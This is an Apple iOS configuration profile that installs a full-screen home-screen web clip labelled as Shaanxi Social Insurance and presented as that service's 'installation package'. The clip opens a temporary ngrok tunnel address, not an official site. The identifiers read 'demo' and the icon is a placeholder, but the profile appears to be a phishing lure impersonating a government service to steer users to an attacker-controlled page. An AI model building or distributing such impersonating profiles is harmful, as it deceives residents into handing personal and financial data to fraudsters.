<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>PayloadContent</key>
	<array>
		<dict>
			<key>FullScreen</key>
			<true/>
			<key>Icon</key>
			<data>REPLACE_WITH_BASE64_PNG</data>
			<key>IsRemovable</key>
			<true/>
			<key>Label</key>
			<string>陕西社会保险</string>
			<key>PayloadDescription</key>
			<string>Configures WebClip</string>
			<key>PayloadDisplayName</key>
			<string>陕西社会保险</string>
			<key>PayloadIdentifier</key>
			<string>com.demo.webclip.icon</string>
			<key>PayloadType</key>
			<string>com.apple.webClip.managed</string>
			<key>PayloadUUID</key>
			<string>F99CDA9F-17C7-49D0-A3B2-6D8A3F0B55F0</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>Precomposed</key>
			<true/>
			<key>URL</key>
			<string>https://perilous-isaac-fortyish.ngrok-free.dev/webclip-site/</string>
		</dict>
	</array>
	<key>PayloadDisplayName</key>
	<string>陕西社会保险安装包</string>
	<key>PayloadIdentifier</key>
	<string>com.demo.profile.icon</string>
	<key>PayloadType</key>
	<string>Configuration</string>
	<key>PayloadUUID</key>
	<string>8E2DABF0-86C6-4DF5-A02B-9C2D77EA9E54</string>
	<key>PayloadVersion</key>
	<integer>1</integer>
</dict>
</plist>
